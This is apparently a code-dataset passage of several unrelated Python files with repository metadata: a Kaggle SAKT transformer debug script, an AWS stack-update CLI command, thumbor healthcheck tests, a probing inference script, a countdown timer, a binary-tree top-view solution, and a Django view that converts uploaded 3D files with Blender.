"api_name": "django.urls.path",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
... |
33350944365 | #%%
import os
import gc
import sys
import pickle
from time import time
import datatable as dt
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import torch
import torch.nn as nn
from torch import optim
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import train_test_split
from torch.autograd import Variable
import torch.optim as optim
from torch.optim import Optimizer
from torch.optim.lr_scheduler import (CosineAnnealingWarmRestarts, CyclicLR, OneCycleLR,
ReduceLROnPlateau)
from torch.utils.data import DataLoader, Dataset
from tqdm import tqdm
sns.set()
DEFAULT_FIG_WIDTH = 20
sns.set_context("paper", font_scale=1.2)
# WORKSPACE_FOLDER=/home/scao/Documents/kaggle-riiid-test
# PYTHONPATH=${WORKSPACE_FOLDER}:${WORKSPACE_FOLDER}/sakt:${WORKSPACE_FOLDER}/transformer
HOME = os.path.abspath(os.path.join('.', os.pardir))
print(HOME, '\n\n')
# HOME = "/home/scao/Documents/kaggle-riiid-test/"
MODEL_DIR = os.path.join(HOME, 'model')
DATA_DIR = os.path.join(HOME, 'data')
sys.path.append(HOME)
from utils import *
get_system()
from sakt import *
from iter_env import *
# from transformer_optimizers import *
# %%
'''
TO-DO:
features encoding:
1 how to address the problem with previous answers correctly not uniformly predicted
2 question tags
'''
DEBUG = True
TRAIN = False
PREPROCESS = False
TEST_SIZE = 0.05
NUM_SKILLS = 13523 # number of problems
MAX_SEQ = 180
ACCEPTED_USER_CONTENT_SIZE = 4
EMBED_SIZE = 128
NUM_HEADS = 8
BATCH_SIZE = 64
VAL_BATCH_SIZE = 2048
DEBUG_TEST_SIZE = 2500
DROPOUT = 0.1
SEED = 1127
get_seed(SEED)
'''
Columns placeholder and preprocessing params
'''
CONTENT_TYPE_ID = "content_type_id"
CONTENT_ID = "content_id"
TARGET = "answered_correctly"
USER_ID = "user_id"
PRIOR_QUESTION_TIME = 'prior_question_elapsed_time'
PRIOR_QUESTION_EXPLAIN = 'prior_question_had_explanation'
TASK_CONTAINER_ID = "task_container_id"
TIMESTAMP = "timestamp"
ROW_ID = 'row_id'
FILLNA_VAL = 14_000 # for prior question elapsed time, rounded average in train
TIME_SCALING = 1000 # scaling down the prior question elapsed time
TRAIN_COLS = [TIMESTAMP, USER_ID, CONTENT_ID, CONTENT_TYPE_ID, TARGET]
TRAIN_COLS_NEW = [TIMESTAMP, USER_ID, CONTENT_ID, CONTENT_TYPE_ID,
TARGET, PRIOR_QUESTION_TIME, PRIOR_QUESTION_EXPLAIN]
TRAIN_DTYPES = {TIMESTAMP: 'int64',
USER_ID: 'int32',
CONTENT_ID: 'int16',
CONTENT_TYPE_ID: 'bool',
TARGET:'int8',
PRIOR_QUESTION_TIME: np.float32,
PRIOR_QUESTION_EXPLAIN: 'boolean'}
if DEBUG:
NROWS_TEST = 25_000
NROWS_TRAIN = 5_000_000
NROWS_VAL = 500_000
else:
NROWS_TEST = 250_000
NROWS_TRAIN = 50_000_000
NROWS_VAL = 2_000_000
# %%
if PREPROCESS:
with timer("Loading train from parquet"):
train_df = pd.read_parquet(os.path.join(DATA_DIR, 'cv2_train.parquet'),
columns=list(TRAIN_DTYPES.keys())).astype(TRAIN_DTYPES)
valid_df = pd.read_parquet(os.path.join(DATA_DIR, 'cv2_valid.parquet'),
columns=list(TRAIN_DTYPES.keys())).astype(TRAIN_DTYPES)
if DEBUG:
train_df = train_df[:NROWS_TRAIN]
valid_df = valid_df[:NROWS_VAL]
with timer("Processing train"):
train_group = preprocess(train_df)
valid_group = preprocess(valid_df, train_flag=2)
else:
with open(os.path.join(DATA_DIR, 'sakt_group_cv2.pickle'), 'rb') as f:
group = pickle.load(f)
train_group, valid_group = train_test_split(group, test_size = TEST_SIZE, random_state=SEED)
print(f"valid users: {len(valid_group.keys())}")
print(f"train users: {len(train_group.keys())}")
# %%
class SAKTDataset(Dataset):
def __init__(self, group, n_skill, max_seq=MAX_SEQ):
super(SAKTDataset, self).__init__()
self.samples, self.n_skill, self.max_seq = {}, n_skill, max_seq
self.user_ids = []
for i, user_id in enumerate(group.index):
content_id, answered_correctly = group[user_id]
if len(content_id) >= ACCEPTED_USER_CONTENT_SIZE:
if len(content_id) > self.max_seq:
total_questions = len(content_id)
last_pos = total_questions // self.max_seq
for seq in range(last_pos):
index = f"{user_id}_{seq}"
self.user_ids.append(index)
start = seq * self.max_seq
end = (seq + 1) * self.max_seq
self.samples[index] = (content_id[start:end],
answered_correctly[start:end])
if len(content_id[end:]) >= ACCEPTED_USER_CONTENT_SIZE:
index = f"{user_id}_{last_pos + 1}"
self.user_ids.append(index)
self.samples[index] = (content_id[end:],
answered_correctly[end:])
else:
index = f'{user_id}'
self.user_ids.append(index)
self.samples[index] = (content_id, answered_correctly)
def __len__(self):
return len(self.user_ids)
def __getitem__(self, index):
user_id = self.user_ids[index]
content_id, answered_correctly = self.samples[user_id]
seq_len = len(content_id)
content_id_seq = np.zeros(self.max_seq, dtype=int)
answered_correctly_seq = np.zeros(self.max_seq, dtype=int)
if seq_len >= self.max_seq:
content_id_seq[:] = content_id[-self.max_seq:]
answered_correctly_seq[:] = answered_correctly[-self.max_seq:]
else:
content_id_seq[-seq_len:] = content_id
answered_correctly_seq[-seq_len:] = answered_correctly
target_id = content_id_seq[1:] # question till the current one
label = answered_correctly_seq[1:]
x = content_id_seq[:-1].copy() # question till the previous one
# encoded answers till the previous one
x += (answered_correctly_seq[:-1] == 1) * self.n_skill
return x, target_id, label
# %%
train_dataset = SAKTDataset(train_group, n_skill=NUM_SKILLS, max_seq=MAX_SEQ)
train_dataloader = DataLoader(train_dataset,
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True)
val_dataset = SAKTDataset(valid_group, n_skill=NUM_SKILLS, max_seq=MAX_SEQ)
val_dataloader = DataLoader(val_dataset,
batch_size=VAL_BATCH_SIZE,
shuffle=False)
print(f"Length of the train loader is {len(train_dataloader)}")
#%%
sample_batch = next(iter(train_dataloader))
sample_batch[0].shape, sample_batch[1].shape, sample_batch[2].shape
# %%
'''
Debugging
'''
content_id, answered_correctly = train_group[train_group.keys()[0]]
seq_len = len(content_id)
content_id_seq = np.zeros(MAX_SEQ, dtype=int)
answered_correctly_seq = np.zeros(MAX_SEQ, dtype=int)
if seq_len >= MAX_SEQ:
content_id_seq[:] = content_id[-MAX_SEQ:]
answered_correctly_seq[:] = answered_correctly[-MAX_SEQ:]
else:
content_id_seq[-seq_len:] = content_id
answered_correctly_seq[-seq_len:] = answered_correctly
# question till the current one, should be the same with sample_batch[1][0]
target_id = content_id_seq[1:]
# whether answered correctly, same with sample_batch[2][0]
label = answered_correctly_seq[1:] #
x = content_id_seq[:-1].copy() # question till the previous one
# encoded answers till the previous question
# if a user answered correctly it is added 13523
x += (answered_correctly_seq[:-1] == 1) * NUM_SKILLS
# %% Merging questions
# questions_df = pd.read_csv(os.path.join(DATA_DIR, 'questions.csv'))
# questions_df['part'] = questions_df['part'].astype(np.int32)
# questions_df['bundle_id'] = questions_df['bundle_id'].astype(np.int32)
# train_debug = pd.merge(train_df, questions_df[['question_id', 'part']],
# left_on = 'content_id', right_on = 'question_id', how = 'left')
# %% model
class FFN(nn.Module):
def __init__(self, state_size = MAX_SEQ,
forward_expansion = 1,
bn_size=MAX_SEQ - 1,
dropout=0.2):
super(FFN, self).__init__()
self.state_size = state_size
self.lr1 = nn.Linear(state_size, forward_expansion * state_size)
self.relu = nn.ReLU()
self.bn = nn.BatchNorm1d(bn_size)
self.lr2 = nn.Linear(forward_expansion * state_size, state_size)
self.dropout = nn.Dropout(dropout)
def forward(self, x):
x = self.relu(self.lr1(x))
x = self.bn(x)
x = self.lr2(x)
return self.dropout(x)
def future_mask(seq_length):
future_mask = (np.triu(np.ones([seq_length, seq_length]), k = 1)).astype('bool')
return torch.from_numpy(future_mask)
class TransformerBlock(nn.Module):
def __init__(self, embed_dim,
heads = 8,
dropout = DROPOUT,
forward_expansion = 1):
super(TransformerBlock, self).__init__()
self.multi_att = nn.MultiheadAttention(embed_dim=embed_dim,
num_heads=heads, dropout=dropout)
self.dropout = nn.Dropout(dropout)
self.layer_normal = nn.LayerNorm(embed_dim)
self.ffn = FFN(embed_dim,
forward_expansion = forward_expansion,
dropout=dropout)
self.layer_normal_2 = nn.LayerNorm(embed_dim)
def forward(self, value, key, query, att_mask):
att_output, att_weight = self.multi_att(value, key, query, attn_mask=att_mask)
att_output = self.dropout(self.layer_normal(att_output + value))
att_output = att_output.permute(1, 0, 2)
# att_output: [s_len, bs, embed] => [bs, s_len, embed]
x = self.ffn(att_output)
x = self.dropout(self.layer_normal_2(x + att_output))
return x.squeeze(-1), att_weight
class Encoder(nn.Module):
def __init__(self, n_skill, max_seq=100,
embed_dim=128,
dropout = DROPOUT,
forward_expansion = 1,
num_layers=1,
heads = 8):
super(Encoder, self).__init__()
self.n_skill, self.embed_dim = n_skill, embed_dim
self.embedding = nn.Embedding(2 * n_skill + 1, embed_dim)
self.pos_embedding = nn.Embedding(max_seq - 1, embed_dim)
self.e_embedding = nn.Embedding(n_skill+1, embed_dim)
self.layers = nn.ModuleList([TransformerBlock(embed_dim, heads=heads,
forward_expansion = forward_expansion) for _ in range(num_layers)])
self.dropout = nn.Dropout(dropout)
def forward(self, x, question_ids):
device = x.device
x = self.embedding(x)
pos_id = torch.arange(x.size(1)).unsqueeze(0).to(device)
pos_x = self.pos_embedding(pos_id)
x = self.dropout(x + pos_x)
x = x.permute(1, 0, 2) # x: [bs, s_len, embed] => [s_len, bs, embed]
e = self.e_embedding(question_ids)
e = e.permute(1, 0, 2)
for layer in self.layers:
att_mask = future_mask(e.size(0)).to(device)
x, att_weight = layer(e, x, x, att_mask=att_mask)
x = x.permute(1, 0, 2)
x = x.permute(1, 0, 2)
return x, att_weight
class SAKTModel(nn.Module):
def __init__(self,
n_skill,
max_seq=MAX_SEQ,
embed_dim=EMBED_SIZE,
dropout = DROPOUT,
forward_expansion = 1,
enc_layers=1,
heads = NUM_HEADS):
super(SAKTModel, self).__init__()
self.encoder = Encoder(n_skill,
max_seq,
embed_dim,
dropout,
forward_expansion,
num_layers=enc_layers,
heads=heads)
self.pred = nn.Linear(embed_dim, 1)
def forward(self, x, question_ids):
x, att_weight = self.encoder(x, question_ids)
x = self.pred(x)
return x.squeeze(-1), att_weight
class TestDataset(Dataset):
def __init__(self, samples, test_df, n_skill, max_seq=100):
super(TestDataset, self).__init__()
self.samples = samples
self.user_ids = [x for x in test_df["user_id"].unique()]
self.test_df = test_df
self.n_skill, self.max_seq = n_skill, max_seq
def __len__(self):
return self.test_df.shape[0]
def __getitem__(self, index):
test_info = self.test_df.iloc[index]
user_id = test_info['user_id']
target_id = test_info['content_id']
content_id_seq = np.zeros(self.max_seq, dtype=int)
answered_correctly_seq = np.zeros(self.max_seq, dtype=int)
if user_id in self.samples.index:
content_id, answered_correctly = self.samples[user_id]
seq_len = len(content_id)
if seq_len >= self.max_seq:
content_id_seq = content_id[-self.max_seq:]
answered_correctly_seq = answered_correctly[-self.max_seq:]
else:
content_id_seq[-seq_len:] = content_id
answered_correctly_seq[-seq_len:] = answered_correctly
x = content_id_seq[1:].copy()
x += (answered_correctly_seq[1:] == 1) * self.n_skill
questions = np.append(content_id_seq[2:], [target_id])
return x, questions
# %% Loading models
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print(f'\nUsing device: {device}')
model_file = MODEL_DIR+'sakt_seq_180_auc_0.7689.pth'
model = SAKTModel(n_skill=NUM_SKILLS,
max_seq=MAX_SEQ,
embed_dim=EMBED_SIZE,
forward_expansion=1,
enc_layers=1,
heads=NUM_HEADS,
dropout=DROPOUT)
n_params = get_num_params(model)
print(f"Current model has {n_params} parameters.")
model = model.to(device)
model.load_state_dict(torch.load(model_file, map_location=device))
#%% Loading mock test set
with timer("Loading private simulated test set"):
all_test_df = pd.read_parquet(DATA_DIR+'cv2_valid.parquet')
all_test_df = all_test_df[:DEBUG_TEST_SIZE]
all_test_df['answer_correctly_true'] = all_test_df[TARGET]
# %% mock test
predicted = []
def set_predict(df):
predicted.append(df)
# reload all user group for cv2
with timer('loading cv2'):
with open(os.path.join(DATA_DIR, 'sakt_group_cv2.pickle'), 'rb') as f:
group = pickle.load(f)
#%%
def iter_env_run(all_test_df, n_iter=1):
'''
Running mock test for n_iter iterations using tito's iter_env simulator and cv2_train user group.
'''
iter_test = Iter_Valid(all_test_df, max_user=1000)
prev_test_df = None
prev_group = None
batch_user_ids = []
# reload all user group for cv2
with open(os.path.join(DATA_DIR, 'sakt_group_cv2.pickle'), 'rb') as f:
group = pickle.load(f)
for _ in range(n_iter):
test_df, sample_prediction_df = next(iter_test)
if prev_test_df is not None:
prev_test_df['answered_correctly'] = eval(test_df['prior_group_answers_correct'].iloc[0])
prev_test_df = prev_test_df[prev_test_df.content_type_id == False]
prev_group = prev_test_df[['user_id', 'content_id', 'answered_correctly']]\
.groupby('user_id').apply(lambda r: (
r['content_id'].values,
r['answered_correctly'].values))
for prev_user_id in prev_group.index:
prev_group_content = prev_group[prev_user_id][0]
prev_group_answered_correctly = prev_group[prev_user_id][1]
if prev_user_id in group.index:
group[prev_user_id] = (np.append(group[prev_user_id][0], prev_group_content),
np.append(group[prev_user_id][1], prev_group_answered_correctly))
else:
group[prev_user_id] = (prev_group_content, prev_group_answered_correctly)
if len(group[prev_user_id][0]) > MAX_SEQ:
new_group_content = group[prev_user_id][0][-MAX_SEQ:]
new_group_answered_correctly = group[prev_user_id][1][-MAX_SEQ:]
group[prev_user_id] = (new_group_content, new_group_answered_correctly)
prev_test_df = test_df.copy()
test_df = test_df[test_df.content_type_id == False]
batch_user_ids.append(test_df.user_id.unique())
test_dataset = TestDataset(group, test_df, NUM_SKILLS, max_seq=MAX_SEQ)
test_dataloader = DataLoader(test_dataset, batch_size=len(test_df), shuffle=False)
item = next(iter(test_dataloader))
x = item[0].to(device).long()
target_id = item[1].to(device).long()
with torch.no_grad():
output, _ = model(x, target_id)
output = torch.sigmoid(output)
preds = output[:, -1]
test_df['answered_correctly'] = preds.cpu().numpy()
set_predict(test_df.loc[test_df['content_type_id'] == 0,
['row_id', 'answered_correctly']])
return test_df, output, item, group, prev_group, batch_user_ids
# %%
# user_common = set(batch_user_ids[0])
# for k in range(1, len(batch_user_ids)):
# user_common = user_common.intersection(set(batch_user_ids[k]))
# %%
'''
Current set up, cv2_valid first 25k rows
first 4 batches common user_id: 143316232, 1089397940, 1140583044 (placeholder user?)
'''
print(group[1089397940])
#%% iter number 1
test_df, output, item, group_updated, _, _ = iter_env_run(all_test_df, n_iter=1)
u_idx_loc = test_df.index.get_loc(test_df[test_df.user_id==1089397940].index[0])
print(f"local index of user 1089397940: {u_idx_loc}", '\n')
print(test_df.iloc[u_idx_loc], '\n')
print(item[1][u_idx_loc, -12:]) # user 1089397940 first batch in example_test (question sequence)
print(item[0][u_idx_loc, -12:]) # user 1089397940 first batch in example_test: skill sequence = prev_content_id * (correct or not) + 13523
print(output[u_idx_loc, -12:].cpu().numpy(),'\n') # user 1089397940 probability prediction
print(group_updated[1089397940][0][:12]) # in the first iteration the length is only 11
print(group_updated[1089397940][1][:12])
#%% iter number 2
test_df, output, item, group_updated, _, _ = iter_env_run(all_test_df, n_iter=2)
u_idx_loc = test_df.index.get_loc(test_df[test_df.user_id==1089397940].index[0])
print(f"local index of user 1089397940: {u_idx_loc}", '\n')
print(test_df.iloc[u_idx_loc], '\n')
print(item[1][u_idx_loc, -12:]) # user 1089397940 2nd batch in example_test (question sequence)
print(item[0][u_idx_loc, -12:]) # user 1089397940 2nd batch in example_test: skill sequence = prev_content_id * (correct or not) + 13523
print(output[u_idx_loc, -12:].cpu().numpy(),'\n') # user 1089397940 probability prediction
print(group_updated[1089397940][0][:12]) # in the 2nd iteration the length is only 11
print(group_updated[1089397940][1][:12])
# %%
test_df, output, item, group_updated, _, _ = iter_env_run(all_test_df, n_iter=3)
u_idx_loc = test_df.index.get_loc(test_df[test_df.user_id==1089397940].index[0])
print(f"local index of user 1089397940: {u_idx_loc}", '\n')
print(test_df.iloc[u_idx_loc], '\n')
print(item[1][u_idx_loc, -12:]) # user 1089397940 3rd batch in example_test (question sequence)
print(item[0][u_idx_loc, -12:]) # user 1089397940 3rd batch in example_test: skill sequence = prev_content_id * (correct or not) + 13523
print(output[u_idx_loc, -12:].cpu().numpy(),'\n') # user 1089397940 probability prediction
print(group_updated[1089397940][0][:12]) # in the 3rd iteration the length is only 11
print(group_updated[1089397940][1][:12])
# %%
| scaomath/kaggle-riiid-test | sakt/debug_sakt_2.py | debug_sakt_2.py | py | 20,260 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "seaborn.set",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "seaborn.set_context",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "os.path.abspath",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_n... |
30201145239 | from uuid import uuid1
import click
from awsscripter.stack.helpers import catch_exceptions, confirmation
from awsscripter.stack.helpers import simplify_change_set_description
from awsscripter.stack.helpers import write, get_stack_or_env
from awsscripter.stack.stack_status import StackStatus, StackChangeSetStatus
@click.command(name="update")
@click.argument("path")
@click.option(
"-c", "--change-set", is_flag=True,
help="Create a change set before updating."
)
@click.option(
"-v", "--verbose", is_flag=True, help="Display verbose output."
)
@click.option(
"-y", "--yes", is_flag=True, help="Assume yes to all questions."
)
@click.pass_context
@catch_exceptions
def update_command(ctx, path, change_set, verbose, yes):
"""
Update a stack.
Updates a stack for a given config PATH. Or perform an update via
change-set when the change-set flag is set.
"""
stack, _ = get_stack_or_env(ctx, path)
if change_set:
change_set_name = "-".join(["change-set", uuid1().hex])
stack.create_change_set(change_set_name)
try:
# Wait for change set to be created
status = stack.wait_for_cs_completion(change_set_name)
# Exit if change set fails to create
if status != StackChangeSetStatus.READY:
exit(1)
# Describe changes
description = stack.describe_change_set(change_set_name)
if not verbose:
description = simplify_change_set_description(description)
write(description, ctx.obj["output_format"])
# Execute change set if happy with changes
if yes or click.confirm("Proceed with stack update?"):
stack.execute_change_set(change_set_name)
finally:
# Clean up by deleting change set
stack.delete_change_set(change_set_name)
else:
confirmation("update", yes, stack=path)
response = stack.update()
if response != StackStatus.COMPLETE:
exit(1)
| xformation/awsscripter | awsscripter/cli/stack/update.py | update.py | py | 2,044 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "awsscripter.stack.helpers.get_stack_or_env",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "uuid.uuid1",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "awsscripter.stack.stack_status.StackChangeSetStatus.READY",
"line_number": 42,
"usa... |
17940251781 | from sklearn.linear_model import LogisticRegression
import numpy as np
def logistic(train_feature_dir, train_label_dir, test_feature_dir, test_label_dir):
train_feature = np.load(train_feature_dir)
train_label = np.load(train_label_dir)
test_feature = np.load(test_feature_dir)
test_label = np.load(test_label_dir)
train_feature = np.reshape(train_feature, (len(train_feature), 1, 1, 3584))
test_feature = np.reshape(test_feature, (len(test_feature), 1, 1, 3584))
new_train_feature = []
for i in range(len(train_feature)):
new_train_feature.append(train_feature[i][0][0])
new_test_feature = []
for i in range(len(test_feature)):
new_test_feature.append(test_feature[i][0][0])
lr = LogisticRegression(C=1000.0, random_state=0) # use the default parameters
lr.fit(new_train_feature, train_label)
pre_label = lr.predict_proba(new_test_feature)
_pre_label = []
for i in range(len(test_feature)):
_pre_label.append(pre_label[i][1])
return np.array(_pre_label), test_label
| jingmouren/antifraud | antifraud/methods/LR.py | LR.py | py | 1,063 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "numpy.load",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 10,
... |
43242806041 | from preggy import expect
from tornado.testing import gen_test
from tests.base import TestCase
from thumbor.config import Config
from thumbor.context import Context
from thumbor.importer import Importer
class HealthcheckHandlerTestCase(TestCase):
@gen_test
async def test_can_get_healthcheck(self):
response = await self.async_get("/healthcheck")
expect(response.code).to_equal(200)
expect(response.body).to_equal("WORKING")
expect(response.headers.get("Cache-Control")).to_equal("no-cache")
@gen_test
async def test_can_head_healthcheck(self):
response = await self.async_fetch("/healthcheck", method="HEAD")
expect(response.code).to_equal(200)
expect(response.headers.get("Cache-Control")).to_equal("no-cache")
# Same test, but configured for the root URL
class HealthcheckOnRootTestCase(TestCase):
def get_context(self):
cfg = Config()
cfg.HEALTHCHECK_ROUTE = "/"
importer = Importer(cfg)
importer.import_modules()
return Context(None, cfg, importer)
@gen_test
async def test_can_get_healthcheck(self):
response = await self.async_get("/")
expect(response.code).to_equal(200)
expect(response.body).to_equal("WORKING")
@gen_test
async def test_can_head_healthcheck(self):
response = await self.async_fetch("/", method="HEAD")
expect(response.code).to_equal(200)
| thumbor/thumbor | tests/handlers/test_healthcheck.py | test_healthcheck.py | py | 1,446 | python | en | code | 9,707 | github-code | 6 | [
{
"api_name": "tests.base.TestCase",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "preggy.expect",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "preggy.expect",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "preggy.expect",
"... |
15892112680 | from argparse import ArgumentParser
import os
import logging
from sys import stdin, stdout
import yaml
import gc
import torch
from probing.inference import Inference
class NotAnExperimentDir(ValueError):
pass
def find_last_model(experiment_dir):
model_pre = os.path.join(experiment_dir, 'model')
if os.path.exists(model_pre):
return model_pre
saves = filter(lambda f: f.startswith(
'model.epoch_'), os.listdir(experiment_dir))
last_epoch = max(saves, key=lambda f: int(f.split("_")[-1]))
return os.path.join(experiment_dir, last_epoch)
def find_in_out_file_name(experiment_dir, prefix='test'):
cfg = os.path.join(experiment_dir, 'config.yaml')
if not os.path.exists(cfg):
raise NotAnExperimentDir(f"{cfg} does not exist")
with open(cfg) as f:
train_fn = yaml.load(f, Loader=yaml.FullLoader)['train_file']
inf = train_fn.replace('/train', f'/{prefix}')
outf = os.path.join(experiment_dir, f'{prefix}.out')
accf = os.path.join(experiment_dir, f'{prefix}.word_accuracy')
return inf, outf, accf
def skip_dir(experiment_dir, test_out):
if not os.path.exists(test_out):
return False
model_fn = find_last_model(experiment_dir)
return os.path.getmtime(model_fn) < os.path.getmtime(test_out)
def compute_accuracy(reference, prediction):
acc = 0
samples = 0
with open(reference) as r, open(prediction) as p:
for rline in r:
try:
pline = next(p)
except StopIteration:
logging.error(f"Prediction file {prediction} shorter "
f"than reference {reference}")
return acc / samples
if not rline.strip() and not pline.strip():
continue
rlabel = rline.rstrip("\n").split("\t")[-1]
plabel = pline.rstrip("\n").split("\t")[-1]
acc += (rlabel == plabel)
samples += 1
return acc / samples
def parse_args():
p = ArgumentParser()
p.add_argument("experiment_dirs", nargs="+", type=str,
help="Experiment directory")
p.add_argument("--run-on-dev", action="store_true")
p.add_argument("--run-on-test", action="store_true")
p.add_argument("--max-samples", default=None, type=int)
return p.parse_args()
def main():
args = parse_args()
for experiment_dir in args.experiment_dirs:
if not os.path.isdir(experiment_dir):
logging.info(f"{experiment_dir} not directory, skipping")
continue
if args.run_on_test:
try:
test_in, test_out, test_acc = find_in_out_file_name(experiment_dir, 'test')
if not skip_dir(experiment_dir, test_out):
logging.info(f"Running inference on {experiment_dir}")
inf = Inference(experiment_dir, test_in, max_samples=args.max_samples)
with open(test_out, 'w') as f:
inf.run_and_print(f)
acc = compute_accuracy(test_in, test_out)
logging.info(f"{experiment_dir} test acc: {acc}")
with open(test_acc, 'w') as f:
f.write(f"{acc}\n")
gc.collect()
torch.cuda.empty_cache()
except NotAnExperimentDir:
logging.info(f"{experiment_dir}: no config.yaml, skipping")
if args.run_on_dev:
try:
dev_in, dev_out, dev_acc = find_in_out_file_name(experiment_dir, 'dev')
if not skip_dir(experiment_dir, dev_out):
inf = Inference(experiment_dir, dev_in, max_samples=args.max_samples)
with open(dev_out, 'w') as f:
inf.run_and_print(f)
acc = compute_accuracy(dev_in, dev_out)
logging.info(f"{experiment_dir} dev acc: {acc}")
with open(dev_acc, 'w') as f:
f.write(f"{acc}\n")
gc.collect()
torch.cuda.empty_cache()
except NotAnExperimentDir:
logging.info(f"{experiment_dir}: no config.yaml, skipping")
if __name__ == '__main__':
log_fmt = '%(asctime)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=log_fmt)
main()
| juditacs/probing | src/probing/batch_inference.py | batch_inference.py | py | 4,385 | python | en | code | 3 | github-code | 6 | [
{
"api_name": "os.path.join",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "os.path.exists",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number":... |
41465348149 | from commands import *
from pyfiglet import Figlet
from datetime import timedelta
fterm = f = Figlet(font="term", justify="center", width=Console.width())
# fonts = Str.nl(File.read("pyfiglet_fonts.txt").strip())
def now():
return Time.datetime()
ends = []
for arg in OS.args[1:]:
ends.append(arg)
if not ends:
print("No times given, exit")
endtimes = []
last_endtime = Time.datetime(year=1970)
for end in ends:
end = Str.get_integers(end)
new_endtime = Time.datetime(hour = end[0], minute = end[1], second = 0)
while True:
if new_endtime < last_endtime:
new_endtime = new_endtime + timedelta(days=1)
else:
break
endtimes.append(new_endtime)
last_endtime = new_endtime
#debug
# for endtime in endtimes:
# print(endtime)
#debug END
endtimes.sort()
#debug
# print()
# for endtime in endtimes:
# print(endtime)
#debug END
# cnt = Json("time_until_cnt.json")
# if not isinstance(cnt.string, int):
# cnt.string = 0
while True:
Console.clean()
rebuild = True
for endtime in endtimes:
time = now()
# Print.debug(f"{endtime=}")
# Print.debug(f"{time=}")
if endtime < time:
continue
rebuild = False
seconds = int((endtime-time).total_seconds())
# Print.debug(f"{seconds=}")
human_readable = Time.human_readable(seconds)
# Print.debug(f"{human_readable=}")
# font = Random.item(fonts)
# try:
# font = fonts[cnt.string]
# except IndexError:
# cnt.string = 0
# font = fonts[cnt.string]
# font = "minecraft"
font = "minecraft_condenced"
# cnt.string += 1
# cnt.save()
# print(fterm.renderText(f"{font} {cnt.string}/{len(fonts)}"))
# print(fterm.renderText(f"{font}"))
f = Figlet(font=font, justify="center", width=Console.width())
until = f"{endtime.hour:02}:{endtime.minute:02}"
if endtime.day != time.day:
until = f"{endtime.day:02}.{endtime.month:02} {until}"
print(f.renderText(f"{human_readable} until {until}").rstrip())
# if seconds <= 0:
# Console.blink()
# break
if rebuild:
for cnt, endtime in enumerate(endtimes):
endtimes[cnt] = endtime + Time.delta(24*3600)
# OS.exit(1)
Time.sleep(1)
| egigoka/test | time_until.py | time_until.py | py | 2,474 | python | en | code | 2 | github-code | 6 | [
{
"api_name": "pyfiglet.Figlet",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "datetime.timedelta",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "pyfiglet.Figlet",
"line_number": 92,
"usage_type": "call"
}
] |
811951116 | # Top View of Binary Tree
# Given a pointer to the root of a binary tree, print the top view of the binary tree.
# The tree as seen from the top the nodes, is called the top view of the tree.
# For example :
# 1
# \
# 2
# \
# 5
# / \
# 3 6
# \
# 4
# Top View : 1 2 5 6
from collections import deque
def topView(root):
#Write your code here
stack = []
q = deque([(root, 0)])
output = {}
while q:
node, horizontalDistance = q.popleft()
if node:
if horizontalDistance not in output:
output[horizontalDistance] = node.info
if node.left:
q.append((node.left, horizontalDistance-1))
if node.right:
q.append((node.right, horizontalDistance+1))
for i in sorted(output):
print(output[i], end = " ") | Saima-Chaity/Leetcode | Tree/TopViewOfBinaryTree.py | TopViewOfBinaryTree.py | py | 882 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "collections.deque",
"line_number": 23,
"usage_type": "call"
}
] |
71168709947 | import os
import subprocess
from django.conf import settings
from django.utils.dateparse import parse_date
from rest_framework import status
from rest_framework.pagination import LimitOffsetPagination
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.generics import ListCreateAPIView, RetrieveDestroyAPIView
from .models import ConvertedModel
from .serializers import ConvertedModelSerializer
class ConvertedModelListCreateView(ListCreateAPIView):
serializer_class = ConvertedModelSerializer
permission_classes = [IsAuthenticated]
pagination_class = LimitOffsetPagination
def get_queryset(self):
queryset = ConvertedModel.objects.filter(user=self.request.user)
start_date = self.request.query_params.get('start_date')
end_date = self.request.query_params.get('end_date')
if start_date:
start_date = parse_date(start_date)
queryset = queryset.filter(timestamp__gte=start_date)
if end_date:
end_date = parse_date(end_date)
queryset = queryset.filter(timestamp__lte=end_date)
return queryset
def perform_create(self, serializer):
original_file = self.request.FILES.get('original_file')
if not original_file:
return Response("No file provided", status=status.HTTP_400_BAD_REQUEST)
# Создание экземпляра модели напрямую сохранит файл в нужном месте
converted_model = ConvertedModel.objects.create(
user=self.request.user,
original_file=original_file
)
# Получение абсолютного пути к файлу
original_file_path = converted_model.original_file.path
try:
# Конвертация файла
converted_files_dir = os.path.join(settings.MEDIA_ROOT, 'converted_files')
os.makedirs(converted_files_dir, exist_ok=True)
output_file_name = os.path.splitext(original_file.name)[0] + '.glb'
output_file_path = os.path.join(converted_files_dir, output_file_name)
blender_executable = "blender"
blender_script = os.path.join('fileconverter', 'blender_script.py')
try:
subprocess.run([blender_executable, "--background", "--python", blender_script, original_file_path,
output_file_path], check=True)
except subprocess.CalledProcessError:
print(f"...")
if not os.path.exists(output_file_path):
raise Exception(f"Converted file not found: {output_file_path}")
